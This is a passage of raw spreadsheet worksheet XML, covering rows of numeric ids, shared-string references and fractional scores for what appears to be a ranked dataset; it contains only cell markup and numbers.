      <c r="E29624" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29624" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="29625" ht="15.75" customHeight="1">
      <c r="A29625" s="1">
        <v>28803.0</v>
      </c>
      <c r="B29625" s="2">
        <v>2.8660022E7</v>
      </c>
      <c r="C29625" s="2" t="s">
        <v>28476</v>
      </c>
      <c r="D29625" s="2">
        <v>1.0</v>
      </c>
      <c r="E29625" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29625" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="29626" ht="15.75" customHeight="1">
      <c r="A29626" s="1">
        <v>15006.0</v>
      </c>
      <c r="B29626" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C29626" s="2" t="s">
        <v>28477</v>
      </c>
      <c r="D29626" s="2">
        <v>1.0</v>
      </c>
      <c r="E29626" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29626" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="29627" ht="15.75" customHeight="1">
      <c r="A29627" s="1">
        <v>19204.0</v>
      </c>
      <c r="B29627" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C29627" s="2" t="s">
        <v>28478</v>
      </c>
      <c r="D29627" s="2">
        <v>1.0</v>
      </c>
      <c r="E29627" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29627" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="29628" ht="15.75" customHeight="1">
      <c r="A29628" s="1">
        <v>2992.0</v>
      </c>
      <c r="B29628" s="2">
        <v>3.6265016E7</v>
      </c>
      <c r="C29628" s="2" t="s">
        <v>28479</v>
      </c>
      <c r="D29628" s="2">
        <v>1.0</v>
      </c>
      <c r="E29628" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29628" s="2">
        <v>0.09538784067085956</v>
      </c>
    </row>
    <row r="29629" ht="15.75" customHeight="1">
      <c r="A29629" s="1">
        <v>34028.0</v>
      </c>
      <c r="B29629" s="2">
        <v>9545897.0</v>
      </c>
      <c r="C29629" s="2" t="s">
        <v>7271</v>
      </c>
      <c r="D29629" s="2">
        <v>1.0</v>
      </c>
      <c r="E29629" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29629" s="2">
        <v>0.09510357815442562</v>
      </c>
    </row>
    <row r="29630" ht="15.75" customHeight="1">
      <c r="A29630" s="1">
        <v>9315.0</v>
      </c>
      <c r="B29630" s="2">
        <v>5.5575277E7</v>
      </c>
      <c r="C29630" s="2" t="s">
        <v>28480</v>
      </c>
      <c r="D29630" s="2">
        <v>1.0</v>
      </c>
      <c r="E29630" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29630" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="29631" ht="15.75" customHeight="1">
      <c r="A29631" s="1">
        <v>27084.0</v>
      </c>
      <c r="B29631" s="2">
        <v>2.0484123E7</v>
      </c>
      <c r="C29631" s="2" t="s">
        <v>28481</v>
      </c>
      <c r="D29631" s="2">
        <v>1.0</v>
      </c>
      <c r="E29631" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29631" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="29632" ht="15.75" customHeight="1">
      <c r="A29632" s="1">
        <v>33578.0</v>
      </c>
      <c r="B29632" s="2">
        <v>8278160.0</v>
      </c>
      <c r="C29632" s="2" t="s">
        <v>28482</v>
      </c>
      <c r="D29632" s="2">
        <v>1.0</v>
      </c>
      <c r="E29632" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29632" s="2">
        <v>0.09482758620689655</v>
      </c>
    </row>
    <row r="29633" ht="15.75" customHeight="1">
      <c r="A29633" s="1">
        <v>3658.0</v>
      </c>
      <c r="B29633" s="2">
        <v>3.9331434E7</v>
      </c>
      <c r="C29633" s="2" t="s">
        <v>28483</v>
      </c>
      <c r="D29633" s="2">
        <v>1.0</v>
      </c>
      <c r="E29633" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29633" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29634" ht="15.75" customHeight="1">
      <c r="A29634" s="1">
        <v>5737.0</v>
      </c>
      <c r="B29634" s="2">
        <v>4.6613231E7</v>
      </c>
      <c r="C29634" s="2" t="s">
        <v>28484</v>
      </c>
      <c r="D29634" s="2">
        <v>1.0</v>
      </c>
      <c r="E29634" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29634" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29635" ht="15.75" customHeight="1">
      <c r="A29635" s="1">
        <v>6567.0</v>
      </c>
      <c r="B29635" s="2">
        <v>4.890269E7</v>
      </c>
      <c r="C29635" s="2" t="s">
        <v>28485</v>
      </c>
      <c r="D29635" s="2">
        <v>1.0</v>
      </c>
      <c r="E29635" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29635" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29636" ht="15.75" customHeight="1">
      <c r="A29636" s="1">
        <v>7272.0</v>
      </c>
      <c r="B29636" s="2">
        <v>5.0784981E7</v>
      </c>
      <c r="C29636" s="2" t="s">
        <v>28486</v>
      </c>
      <c r="D29636" s="2">
        <v>1.0</v>
      </c>
      <c r="E29636" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29636" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29637" ht="15.75" customHeight="1">
      <c r="A29637" s="1">
        <v>7678.0</v>
      </c>
      <c r="B29637" s="2">
        <v>5.191851E7</v>
      </c>
      <c r="C29637" s="2" t="s">
        <v>28487</v>
      </c>
      <c r="D29637" s="2">
        <v>1.0</v>
      </c>
      <c r="E29637" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29637" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29638" ht="15.75" customHeight="1">
      <c r="A29638" s="1">
        <v>11731.0</v>
      </c>
      <c r="B29638" s="2">
        <v>2.3987796E7</v>
      </c>
      <c r="C29638" s="2" t="s">
        <v>28488</v>
      </c>
      <c r="D29638" s="2">
        <v>1.0</v>
      </c>
      <c r="E29638" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29638" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29639" ht="15.75" customHeight="1">
      <c r="A29639" s="1">
        <v>13158.0</v>
      </c>
      <c r="B29639" s="2">
        <v>3.3846275E7</v>
      </c>
      <c r="C29639" s="2" t="s">
        <v>28489</v>
      </c>
      <c r="D29639" s="2">
        <v>1.0</v>
      </c>
      <c r="E29639" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29639" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29640" ht="15.75" customHeight="1">
      <c r="A29640" s="1">
        <v>15111.0</v>
      </c>
      <c r="B29640" s="2">
        <v>4.1844721E7</v>
      </c>
      <c r="C29640" s="2" t="s">
        <v>28490</v>
      </c>
      <c r="D29640" s="2">
        <v>1.0</v>
      </c>
      <c r="E29640" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29640" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29641" ht="15.75" customHeight="1">
      <c r="A29641" s="1">
        <v>15594.0</v>
      </c>
      <c r="B29641" s="2">
        <v>4.346043E7</v>
      </c>
      <c r="C29641" s="2" t="s">
        <v>28491</v>
      </c>
      <c r="D29641" s="2">
        <v>1.0</v>
      </c>
      <c r="E29641" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29641" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29642" ht="15.75" customHeight="1">
      <c r="A29642" s="1">
        <v>16032.0</v>
      </c>
      <c r="B29642" s="2">
        <v>4.5108392E7</v>
      </c>
      <c r="C29642" s="2" t="s">
        <v>28492</v>
      </c>
      <c r="D29642" s="2">
        <v>1.0</v>
      </c>
      <c r="E29642" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29642" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29643" ht="15.75" customHeight="1">
      <c r="A29643" s="1">
        <v>21325.0</v>
      </c>
      <c r="B29643" s="2">
        <v>2.0969236E7</v>
      </c>
      <c r="C29643" s="2" t="s">
        <v>28493</v>
      </c>
      <c r="D29643" s="2">
        <v>1.0</v>
      </c>
      <c r="E29643" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29643" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29644" ht="15.75" customHeight="1">
      <c r="A29644" s="1">
        <v>25818.0</v>
      </c>
      <c r="B29644" s="2">
        <v>1.4769431E7</v>
      </c>
      <c r="C29644" s="2" t="s">
        <v>28494</v>
      </c>
      <c r="D29644" s="2">
        <v>1.0</v>
      </c>
      <c r="E29644" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29644" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29645" ht="15.75" customHeight="1">
      <c r="A29645" s="1">
        <v>31620.0</v>
      </c>
      <c r="B29645" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C29645" s="2" t="s">
        <v>28446</v>
      </c>
      <c r="D29645" s="2">
        <v>1.0</v>
      </c>
      <c r="E29645" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29645" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29646" ht="15.75" customHeight="1">
      <c r="A29646" s="1">
        <v>33763.0</v>
      </c>
      <c r="B29646" s="2">
        <v>8629843.0</v>
      </c>
      <c r="C29646" s="2" t="s">
        <v>28495</v>
      </c>
      <c r="D29646" s="2">
        <v>1.0</v>
      </c>
      <c r="E29646" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29646" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="29647" ht="15.75" customHeight="1">
      <c r="A29647" s="1">
        <v>12066.0</v>
      </c>
      <c r="B29647" s="2">
        <v>2.6575168E7</v>
      </c>
      <c r="C29647" s="2" t="s">
        <v>28496</v>
      </c>
      <c r="D29647" s="2">
        <v>1.0</v>
      </c>
      <c r="E29647" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29647" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="29648" ht="15.75" customHeight="1">
      <c r="A29648" s="1">
        <v>4525.0</v>
      </c>
      <c r="B29648" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C29648" s="2" t="s">
        <v>28497</v>
      </c>
      <c r="D29648" s="2">
        <v>1.0</v>
      </c>
      <c r="E29648" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29648" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="29649" ht="15.75" customHeight="1">
      <c r="A29649" s="1">
        <v>13984.0</v>
      </c>
      <c r="B29649" s="2">
        <v>3.7356577E7</v>
      </c>
      <c r="C29649" s="2" t="s">
        <v>28498</v>
      </c>
      <c r="D29649" s="2">
        <v>1.0</v>
      </c>
      <c r="E29649" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29649" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="29650" ht="15.75" customHeight="1">
      <c r="A29650" s="1">
        <v>7957.0</v>
      </c>
      <c r="B29650" s="2">
        <v>5.2655969E7</v>
      </c>
      <c r="C29650" s="2" t="s">
        <v>28499</v>
      </c>
      <c r="D29650" s="2">
        <v>1.0</v>
      </c>
      <c r="E29650" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29650" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="29651" ht="15.75" customHeight="1">
      <c r="A29651" s="1">
        <v>16410.0</v>
      </c>
      <c r="B29651" s="2">
        <v>4.6302397E7</v>
      </c>
      <c r="C29651" s="2" t="s">
        <v>28500</v>
      </c>
      <c r="D29651" s="2">
        <v>1.0</v>
      </c>
      <c r="E29651" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29651" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="29652" ht="15.75" customHeight="1">
      <c r="A29652" s="1">
        <v>19826.0</v>
      </c>
      <c r="B29652" s="2">
        <v>5.7032297E7</v>
      </c>
      <c r="C29652" s="2" t="s">
        <v>28501</v>
      </c>
      <c r="D29652" s="2">
        <v>1.0</v>
      </c>
      <c r="E29652" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29652" s="2">
        <v>0.09424603174603172</v>
      </c>
    </row>
    <row r="29653" ht="15.75" customHeight="1">
      <c r="A29653" s="1">
        <v>14188.0</v>
      </c>
      <c r="B29653" s="2">
        <v>3.8150162E7</v>
      </c>
      <c r="C29653" s="2" t="s">
        <v>28502</v>
      </c>
      <c r="D29653" s="2">
        <v>1.0</v>
      </c>
      <c r="E29653" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29653" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="29654" ht="15.75" customHeight="1">
      <c r="A29654" s="1">
        <v>5777.0</v>
      </c>
      <c r="B29654" s="2">
        <v>4.6732017E7</v>
      </c>
      <c r="C29654" s="2" t="s">
        <v>28503</v>
      </c>
      <c r="D29654" s="2">
        <v>1.0</v>
      </c>
      <c r="E29654" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29654" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="29655" ht="15.75" customHeight="1">
      <c r="A29655" s="1">
        <v>19174.0</v>
      </c>
      <c r="B29655" s="2">
        <v>5.4971322E7</v>
      </c>
      <c r="C29655" s="2" t="s">
        <v>28504</v>
      </c>
      <c r="D29655" s="2">
        <v>1.0</v>
      </c>
      <c r="E29655" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29655" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="29656" ht="15.75" customHeight="1">
      <c r="A29656" s="1">
        <v>3327.0</v>
      </c>
      <c r="B29656" s="2">
        <v>3.7681002E7</v>
      </c>
      <c r="C29656" s="2" t="s">
        <v>28505</v>
      </c>
      <c r="D29656" s="2">
        <v>1.0</v>
      </c>
      <c r="E29656" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29656" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29657" ht="15.75" customHeight="1">
      <c r="A29657" s="1">
        <v>8140.0</v>
      </c>
      <c r="B29657" s="2">
        <v>5.3139644E7</v>
      </c>
      <c r="C29657" s="2" t="s">
        <v>28506</v>
      </c>
      <c r="D29657" s="2">
        <v>1.0</v>
      </c>
      <c r="E29657" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29657" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29658" ht="15.75" customHeight="1">
      <c r="A29658" s="1">
        <v>15353.0</v>
      </c>
      <c r="B29658" s="2">
        <v>4.2666497E7</v>
      </c>
      <c r="C29658" s="2" t="s">
        <v>28507</v>
      </c>
      <c r="D29658" s="2">
        <v>1.0</v>
      </c>
      <c r="E29658" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29658" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29659" ht="15.75" customHeight="1">
      <c r="A29659" s="1">
        <v>17811.0</v>
      </c>
      <c r="B29659" s="2">
        <v>5.0884867E7</v>
      </c>
      <c r="C29659" s="2" t="s">
        <v>28508</v>
      </c>
      <c r="D29659" s="2">
        <v>1.0</v>
      </c>
      <c r="E29659" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29659" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29660" ht="15.75" customHeight="1">
      <c r="A29660" s="1">
        <v>19813.0</v>
      </c>
      <c r="B29660" s="2">
        <v>5.6929221E7</v>
      </c>
      <c r="C29660" s="2" t="s">
        <v>28509</v>
      </c>
      <c r="D29660" s="2">
        <v>1.0</v>
      </c>
      <c r="E29660" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29660" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29661" ht="15.75" customHeight="1">
      <c r="A29661" s="1">
        <v>20181.0</v>
      </c>
      <c r="B29661" s="2">
        <v>1.0464875E7</v>
      </c>
      <c r="C29661" s="2" t="s">
        <v>28510</v>
      </c>
      <c r="D29661" s="2">
        <v>1.0</v>
      </c>
      <c r="E29661" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29661" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29662" ht="15.75" customHeight="1">
      <c r="A29662" s="1">
        <v>28769.0</v>
      </c>
      <c r="B29662" s="2">
        <v>2.8411385E7</v>
      </c>
      <c r="C29662" s="2" t="s">
        <v>28511</v>
      </c>
      <c r="D29662" s="2">
        <v>1.0</v>
      </c>
      <c r="E29662" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29662" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="29663" ht="15.75" customHeight="1">
      <c r="A29663" s="1">
        <v>2266.0</v>
      </c>
      <c r="B29663" s="2">
        <v>3.2449801E7</v>
      </c>
      <c r="C29663" s="2" t="s">
        <v>28512</v>
      </c>
      <c r="D29663" s="2">
        <v>1.0</v>
      </c>
      <c r="E29663" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29663" s="2">
        <v>0.09041394335511982</v>
      </c>
    </row>
    <row r="29664" ht="15.75" customHeight="1">
      <c r="A29664" s="1">
        <v>15833.0</v>
      </c>
      <c r="B29664" s="2">
        <v>4.4347343E7</v>
      </c>
      <c r="C29664" s="2" t="s">
        <v>28513</v>
      </c>
      <c r="D29664" s="2">
        <v>1.0</v>
      </c>
      <c r="E29664" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29664" s="2">
        <v>0.2524509803921569</v>
      </c>
    </row>
    <row r="29665" ht="15.75" customHeight="1">
      <c r="A29665" s="1">
        <v>10160.0</v>
      </c>
      <c r="B29665" s="2">
        <v>5.7333093E7</v>
      </c>
      <c r="C29665" s="2" t="s">
        <v>28515</v>
      </c>
      <c r="D29665" s="2">
        <v>1.0</v>
      </c>
      <c r="E29665" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29665" s="2">
        <v>0.2230046948356808</v>
      </c>
    </row>
    <row r="29666" ht="15.75" customHeight="1">
      <c r="A29666" s="1">
        <v>4923.0</v>
      </c>
      <c r="B29666" s="2">
        <v>4.3984522E7</v>
      </c>
      <c r="C29666" s="2" t="s">
        <v>28516</v>
      </c>
      <c r="D29666" s="2">
        <v>1.0</v>
      </c>
      <c r="E29666" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29666" s="2">
        <v>0.2213930348258706</v>
      </c>
    </row>
    <row r="29667" ht="15.75" customHeight="1">
      <c r="A29667" s="1">
        <v>11863.0</v>
      </c>
      <c r="B29667" s="2">
        <v>2.4867196E7</v>
      </c>
      <c r="C29667" s="2" t="s">
        <v>28517</v>
      </c>
      <c r="D29667" s="2">
        <v>1.0</v>
      </c>
      <c r="E29667" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29667" s="2">
        <v>0.2194444444444444</v>
      </c>
    </row>
    <row r="29668" ht="15.75" customHeight="1">
      <c r="A29668" s="1">
        <v>30529.0</v>
      </c>
      <c r="B29668" s="2">
        <v>4.0362066E7</v>
      </c>
      <c r="C29668" s="2" t="s">
        <v>28518</v>
      </c>
      <c r="D29668" s="2">
        <v>1.0</v>
      </c>
      <c r="E29668" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29668" s="2">
        <v>0.2144563918757467</v>
      </c>
    </row>
    <row r="29669" ht="15.75" customHeight="1">
      <c r="A29669" s="1">
        <v>8622.0</v>
      </c>
      <c r="B29669" s="2">
        <v>5.4289921E7</v>
      </c>
      <c r="C29669" s="2" t="s">
        <v>28519</v>
      </c>
      <c r="D29669" s="2">
        <v>1.0</v>
      </c>
      <c r="E29669" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29669" s="2">
        <v>0.2097701149425287</v>
      </c>
    </row>
    <row r="29670" ht="15.75" customHeight="1">
      <c r="A29670" s="1">
        <v>5128.0</v>
      </c>
      <c r="B29670" s="2">
        <v>4.4598334E7</v>
      </c>
      <c r="C29670" s="2" t="s">
        <v>28520</v>
      </c>
      <c r="D29670" s="2">
        <v>1.0</v>
      </c>
      <c r="E29670" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29670" s="2">
        <v>0.2064814814814815</v>
      </c>
    </row>
    <row r="29671" ht="15.75" customHeight="1">
      <c r="A29671" s="1">
        <v>3994.0</v>
      </c>
      <c r="B29671" s="2">
        <v>4.0877428E7</v>
      </c>
      <c r="C29671" s="2" t="s">
        <v>28521</v>
      </c>
      <c r="D29671" s="2">
        <v>1.0</v>
      </c>
      <c r="E29671" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29671" s="2">
        <v>0.2062146892655367</v>
      </c>
    </row>
    <row r="29672" ht="15.75" customHeight="1">
      <c r="A29672" s="1">
        <v>34229.0</v>
      </c>
      <c r="B29672" s="2">
        <v>4729636.0</v>
      </c>
      <c r="C29672" s="2" t="s">
        <v>28522</v>
      </c>
      <c r="D29672" s="2">
        <v>1.0</v>
      </c>
      <c r="E29672" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29672" s="2">
        <v>0.2049180327868853</v>
      </c>
    </row>
    <row r="29673" ht="15.75" customHeight="1">
      <c r="A29673" s="1">
        <v>13295.0</v>
      </c>
      <c r="B29673" s="2">
        <v>3.4470626E7</v>
      </c>
      <c r="C29673" s="2" t="s">
        <v>28523</v>
      </c>
      <c r="D29673" s="2">
        <v>1.0</v>
      </c>
      <c r="E29673" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29673" s="2">
        <v>0.1994949494949495</v>
      </c>
    </row>
    <row r="29674" ht="15.75" customHeight="1">
      <c r="A29674" s="1">
        <v>8035.0</v>
      </c>
      <c r="B29674" s="2">
        <v>5.2828979E7</v>
      </c>
      <c r="C29674" s="2" t="s">
        <v>28524</v>
      </c>
      <c r="D29674" s="2">
        <v>1.0</v>
      </c>
      <c r="E29674" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29674" s="2">
        <v>0.1957364341085272</v>
      </c>
    </row>
    <row r="29675" ht="15.75" customHeight="1">
      <c r="A29675" s="1">
        <v>6353.0</v>
      </c>
      <c r="B29675" s="2">
        <v>4.8320673E7</v>
      </c>
      <c r="C29675" s="2" t="s">
        <v>28525</v>
      </c>
      <c r="D29675" s="2">
        <v>1.0</v>
      </c>
      <c r="E29675" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29675" s="2">
        <v>0.1947250280583614</v>
      </c>
    </row>
    <row r="29676" ht="15.75" customHeight="1">
      <c r="A29676" s="1">
        <v>31918.0</v>
      </c>
      <c r="B29676" s="2">
        <v>5.3029446E7</v>
      </c>
      <c r="C29676" s="2" t="s">
        <v>28526</v>
      </c>
      <c r="D29676" s="2">
        <v>1.0</v>
      </c>
      <c r="E29676" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29676" s="2">
        <v>0.1931216931216932</v>
      </c>
    </row>
    <row r="29677" ht="15.75" customHeight="1">
      <c r="A29677" s="1">
        <v>17966.0</v>
      </c>
      <c r="B29677" s="2">
        <v>5.1347123E7</v>
      </c>
      <c r="C29677" s="2" t="s">
        <v>28527</v>
      </c>
      <c r="D29677" s="2">
        <v>1.0</v>
      </c>
      <c r="E29677" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29677" s="2">
        <v>0.1871794871794872</v>
      </c>
    </row>
    <row r="29678" ht="15.75" customHeight="1">
      <c r="A29678" s="1">
        <v>27505.0</v>
      </c>
      <c r="B29678" s="2">
        <v>2.2105973E7</v>
      </c>
      <c r="C29678" s="2" t="s">
        <v>28528</v>
      </c>
      <c r="D29678" s="2">
        <v>1.0</v>
      </c>
      <c r="E29678" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29678" s="2">
        <v>0.1849315068493151</v>
      </c>
    </row>
    <row r="29679" ht="15.75" customHeight="1">
      <c r="A29679" s="1">
        <v>6722.0</v>
      </c>
      <c r="B29679" s="2">
        <v>4.9286948E7</v>
      </c>
      <c r="C29679" s="2" t="s">
        <v>28529</v>
      </c>
      <c r="D29679" s="2">
        <v>1.0</v>
      </c>
      <c r="E29679" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29679" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="29680" ht="15.75" customHeight="1">
      <c r="A29680" s="1">
        <v>18277.0</v>
      </c>
      <c r="B29680" s="2">
        <v>5.2240232E7</v>
      </c>
      <c r="C29680" s="2" t="s">
        <v>28530</v>
      </c>
      <c r="D29680" s="2">
        <v>1.0</v>
      </c>
      <c r="E29680" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29680" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="29681" ht="15.75" customHeight="1">
      <c r="A29681" s="1">
        <v>11148.0</v>
      </c>
      <c r="B29681" s="2">
        <v>1.9350359E7</v>
      </c>
      <c r="C29681" s="2" t="s">
        <v>28531</v>
      </c>
      <c r="D29681" s="2">
        <v>1.0</v>
      </c>
      <c r="E29681" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29681" s="2">
        <v>0.1826599326599327</v>
      </c>
    </row>
    <row r="29682" ht="15.75" customHeight="1">
      <c r="A29682" s="1">
        <v>21426.0</v>
      </c>
      <c r="B29682" s="2">
        <v>2.2105974E7</v>
      </c>
      <c r="C29682" s="2" t="s">
        <v>28532</v>
      </c>
      <c r="D29682" s="2">
        <v>1.0</v>
      </c>
      <c r="E29682" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29682" s="2">
        <v>0.1818873668188737</v>
      </c>
    </row>
    <row r="29683" ht="15.75" customHeight="1">
      <c r="A29683" s="1">
        <v>18149.0</v>
      </c>
      <c r="B29683" s="2">
        <v>5.1857337E7</v>
      </c>
      <c r="C29683" s="2" t="s">
        <v>28533</v>
      </c>
      <c r="D29683" s="2">
        <v>1.0</v>
      </c>
      <c r="E29683" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29683" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="29684" ht="15.75" customHeight="1">
      <c r="A29684" s="1">
        <v>16528.0</v>
      </c>
      <c r="B29684" s="2">
        <v>4.6695775E7</v>
      </c>
      <c r="C29684" s="2" t="s">
        <v>28534</v>
      </c>
      <c r="D29684" s="2">
        <v>1.0</v>
      </c>
      <c r="E29684" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29684" s="2">
        <v>0.1776094276094277</v>
      </c>
    </row>
    <row r="29685" ht="15.75" customHeight="1">
      <c r="A29685" s="1">
        <v>11978.0</v>
      </c>
      <c r="B29685" s="2">
        <v>2.5791652E7</v>
      </c>
      <c r="C29685" s="2" t="s">
        <v>28535</v>
      </c>
      <c r="D29685" s="2">
        <v>1.0</v>
      </c>
      <c r="E29685" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29685" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="29686" ht="15.75" customHeight="1">
      <c r="A29686" s="1">
        <v>26473.0</v>
      </c>
      <c r="B29686" s="2">
        <v>1.7426143E7</v>
      </c>
      <c r="C29686" s="2" t="s">
        <v>28536</v>
      </c>
      <c r="D29686" s="2">
        <v>1.0</v>
      </c>
      <c r="E29686" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29686" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="29687" ht="15.75" customHeight="1">
      <c r="A29687" s="1">
        <v>26474.0</v>
      </c>
      <c r="B29687" s="2">
        <v>1.7426647E7</v>
      </c>
      <c r="C29687" s="2" t="s">
        <v>28537</v>
      </c>
      <c r="D29687" s="2">
        <v>1.0</v>
      </c>
      <c r="E29687" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29687" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="29688" ht="15.75" customHeight="1">
      <c r="A29688" s="1">
        <v>26476.0</v>
      </c>
      <c r="B29688" s="2">
        <v>1.7442244E7</v>
      </c>
      <c r="C29688" s="2" t="s">
        <v>28537</v>
      </c>
      <c r="D29688" s="2">
        <v>1.0</v>
      </c>
      <c r="E29688" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29688" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="29689" ht="15.75" customHeight="1">
      <c r="A29689" s="1">
        <v>14680.0</v>
      </c>
      <c r="B29689" s="2">
        <v>4.0485969E7</v>
      </c>
      <c r="C29689" s="2" t="s">
        <v>28538</v>
      </c>
      <c r="D29689" s="2">
        <v>1.0</v>
      </c>
      <c r="E29689" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29689" s="2">
        <v>0.1754850088183422</v>
      </c>
    </row>
    <row r="29690" ht="15.75" customHeight="1">
      <c r="A29690" s="1">
        <v>29771.0</v>
      </c>
      <c r="B29690" s="2">
        <v>3.493636E7</v>
      </c>
      <c r="C29690" s="2" t="s">
        <v>28539</v>
      </c>
      <c r="D29690" s="2">
        <v>1.0</v>
      </c>
      <c r="E29690" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29690" s="2">
        <v>0.1737726098191215</v>
      </c>
    </row>
    <row r="29691" ht="15.75" customHeight="1">
      <c r="A29691" s="1">
        <v>17812.0</v>
      </c>
      <c r="B29691" s="2">
        <v>5.0887672E7</v>
      </c>
      <c r="C29691" s="2" t="s">
        <v>28540</v>
      </c>
      <c r="D29691" s="2">
        <v>1.0</v>
      </c>
